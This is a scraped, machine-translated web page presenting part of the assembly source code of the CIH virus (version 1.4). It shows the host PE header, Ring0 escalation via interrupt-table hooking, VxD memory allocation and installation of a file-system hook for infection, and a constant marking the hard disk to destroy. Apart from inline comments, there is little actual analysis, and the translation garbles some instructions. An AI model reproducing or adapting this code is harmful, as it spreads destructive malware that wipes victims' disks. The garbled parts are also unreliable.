Home > Developer > PHP

Virus program source code instance analysis-CIH virus [2]

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >
Virus program source code instance analysis-example code of CIH virus [2] can be referred to below Virus program source code instance analysis-CIH virus [2]

OriginalAppEXE SEGMENT
  
; PE format executable file header
FileHeader:
Db 04dh, 05ah, 090 h, 000 h, 003 h, 000 h, 000 h, 000 h
Db 004 h, 000 h, 000 h, 000 h, 0ffh, 0ffh, 000 h, 000 h
Db 0b8h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 040 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 080 h, 000 h, 000 h, 000 h
Db 00eh, 01fh, 0bah, 00eh, 000 h, 0b4h, 009 h, 0cdh
Db 021 h, 0b8h, 001 h, 04ch, 0cdh, 021 h, 054 h, 068 h
Db 069 h, 073 h, 020 h, 070 h, 072 h, 06fh, 067 h, 072 h
Db 061 h, 06dh, 020 h, 063 h, 061 h, 06eh, 06eh, 06fh
Db 074 h, 020 h, 062 h, 065 h, 020 h, 072 h, 075 h, 06eh
Db 020 h, 069 h, 06eh, 020 h, 044 h, 04fh, 053 h, 020 h
Db 06dh, 06fh, 064 h, 065 h, 02eh, 00dh, 00dh, 00ah
Db 024 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 050 h, 045 h, 000 h, 000 h, 04ch, 001 h, 001 h, 000 h
Db 0f1h, 068 h, 020 h, 035 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 0e0h, 000 h, 00fh, 001 h
Db 00bh, 001 h, 005 h, 000 h, 000 h, 010 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 010 h, 010 h, 000 h, 000 h, 000 h, 010 h, 000 h, 000 h
Db 000 h, 020 h, 000 h, 000 h, 000 h, 000 h, 040 h, 000 h
Db 000 h, 010 h, 000 h, 000 h, 000 h, 002 h, 000 h, 000 h
Db 004 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 004 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 020 h, 000 h, 000 h, 000 h, 002 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 002 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 010 h, 000 h, 000 h, 010 h, 000 h, 000 h
Db 000 h, 000 h, 010 h, 000 h, 000 h, 010 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 010 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 02eh, 074 h, 065 h, 078 h, 074 h, 000 h, 000 h, 000 h
Db 000 h, 010 h, 000 h, 000 h, 000 h, 010 h, 000 h, 000 h
Db 000 h, 010 h, 000 h, 000 h, 000 h, 002 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 020 h, 000 h, 000 h, 060 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 000 h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Db 0c3h, 000 h, 000 h, 000 h, 000 h, 000 h, 000 h
Dd 00000000 h, VirusSize
  
OriginalAppEXE ENDS
  
Virus program starts
TRUE = 1
FALSE = 0
DEBUG = FALSE
  
The version number is 1.4.
MajorVirusVersion = 1; main version
MinorVirusVersion = 4; minor version number
VirusVersion = MajorVirusVersion * 10 h + MinorVirusVersion; merged version
  
If debug; DEBUG or not
FirstKillHardDiskNumber = 81 h; destroys disk D
HookExceptionNumber = 05 h; used to interrupt
ELSE
FirstKillHardDiskNumber = 80 h; destroys drive C
HookxceptionNumber = 03 h; use 3 to interrupt
ENDIF
  
FileNameBufferSize = 7fh
  
The virus code segment starts.
VirusGame SEGMENT
  
Assume cs: VirusGame, DS: VirusGame, SS: VirusGame
Assume es: VirusGame, FS: VirusGame, GS: VirusGame
  
MyVirusStart:
Push ebp
  
; Modify system exception handling to avoid error messages
Lea eax, [esp-04h * 2]
Xor ebx, ebx
Xchg eax, fs: [ebx]
  
Call @ 0
  
@ 0:
Pop ebx; get the start offset of the program. use this offset + relative offset to obtain the absolute address.
Lea ecx, StopToRunVirusCode-@ 0 [ebx]
Push ecx
Push eax
  
; Modify the interrupt description table to obtain the maximum Ring0 permissions
Push eax
Sidt [esp-02h]; get the base address of the interrupt description table to ebx
Pop ebx;
  
Add ebx, HookExceptionNumber * 08 h + 04 h; calculate the base address to be interrupted to ebx
  
Cli; disconnect before modification
  
Mov ebp, [ebx]; get the base address for exception handling
Mov bp, [ebx-04h]; get entry
  
Lea esi, MyExceptionHook-@ 1 [ecx]
  
Push esi; esi indicates the address of the virus interruption routine.
  
Mov [ebx-04h], si;
Shr esi, 16; modification exception
Mov [ebx + 02 h], si; modify the interrupt base address to point to the virus interrupt routine
  
Pop esi
  
; Generate an exception at ring0 level
Int HookExceptionNumber; enters Ring0 through interruption
ReturnAddressOfEndException = $
  
; Merge all virus codes
Push esi
Mov esi, eax; esi points to the beginning of the virus
  
; Replicate cyclically
LoopOfMergeAllVirusCodeSection:
Mov ecx, [eax-04h]
  
Rep movsb; copy the virus code to the first address of the allocated system memory
Sub eax, 08 h
Mov esi, [eax]
Or esi, esi
Jz QuitLoopOfMergeAllVirusCodeSection; ZF = 1
  
Jmp LoopOfMergeAllVirusCodeSection; copy the next section
  
QuitLoopOfMergeAllVirusCodeSection:
Pop esi
Int HookExceptionNumber
  
; Save exception handling
ReadyRestoreSE:
Sti; interrupt
Xor ebx, ebx
Jmp RestoreSE
  
When an exception occurs, it means that the virus stops running in Windows NT and jumps directly to the original program.
StopToRunVirusCode:
@ 1 = StopToRunVirusCode
  
Xor ebx, ebx
Mov eax, fs: [ebx]
Mov esp, [eax]
  
RestoreSE:
Pop dword ptr fs: [ebx]
Pop eax
  
; Jump to the original program and run normally
Pop ebp
  
Push 00401000 h; Push Original
OriginalAddressOfEntryPoint = $-4; add the starting address of the original program to the stack
Ret; return to the beginning of the original program as a subroutine
Virus initialization module
MyExceptionHook:
@ 2 = MyExceptionHook
  
Jz InstallMyFileSystemApiHook; if the virus code has been copied
To install the system Hook program.
  
Mov ecx and dr0; check whether dr0 has been set (dr0 indicates the virus resident flag)
Jecxz AllocateSystemMemoryPage; system memory is allocated if no settings are set.
  
Add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
  
; Returns to the original program
ExitRing0Init:
Mov [ebx-04h], bp;
Shr ebp, 16; Restore Exception
Mov [ebx + 02 h], bp; restore the original interrupt base address
  
Iretd; return of interruption
  
; Allocate the system memory to be used
AllocateSystemMemoryPage:
Mov dr0, ebx; indicates the virus resident. dr0
Push into memory FH;
Push ecx;
Push 0 ffffffffh;
Push ecx; call method ulong extern _ PageAllocate (ULONG nPages,
; ULONG pType, ulong vm, ULONG AlignMask, ULONG minPhys,
; ULONG maxPhys, ULONG * PhysAddr, ULONG flags );
Push ecx;
Push ecx;
Push 000000001 h;
Push 000000002 h;
Int 20 h; VXD call
_ PageAllocate = $
Dd 00010053 h; use the eax, ecx, edx, and flags registers
Add esp, 08 h * 04 h; resume the stack pointer
  
Xchg edi, eax; edi points to the first address of allocated system memory
Lea eax, MyVirusStart-@ 2 [esi]; eax points to the beginning of the virus
  
Iretd; exit interrupted
  
; Initialize the file system Hook
InstallMyFileSystemApiHook:
Lea eax, FileSystemApiHook-@ 6 [edi]; points to the first address of the file system Hook program
  
Push eax;
Int 20 h; Vxd call IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook = $
Dd 00400067 h; use the eax, ecx, edx, and flags registers
  
Mov dr0, eax; save the first address of the original file system Hook program to dr0
Pop eax; eax is equal to the first address of the file system Hook program
  
; Save the original entry for calling the IFSMgr_InstallFileSystemApiHook function
Mov ecx, IFSMgr_InstallFileSystemApiHook-@ 2 [esi]
Mov edx, [ecx]; edx is the entry of IFSMgr_InstallFileSystemApiHook
Mov OldInstallFileSystemApiHook-@ 3 [eax], edx
  
; Modify the IFSMgr_InstallFileSystemApiHook entry
Lea eax, InstallFileSystemApiHook-@ 3 [eax]
Mov [ecx], eax; set the address for calling the new IFSMgr_InstallFileSystemApiHook function
; Point to InstallFileSystemApiHook
Cli; disconnection

The above is the analysis of the virus program source code instance-CIH virus [2] content. For more information, please follow the PHP Chinese network (www.php1.cn )!

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
best computer virus program is malwarebytes virus protection program best virus program for mac trojan horse virus code notepad redis source code analysis sqlite source code analysis rmi program in java source code

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More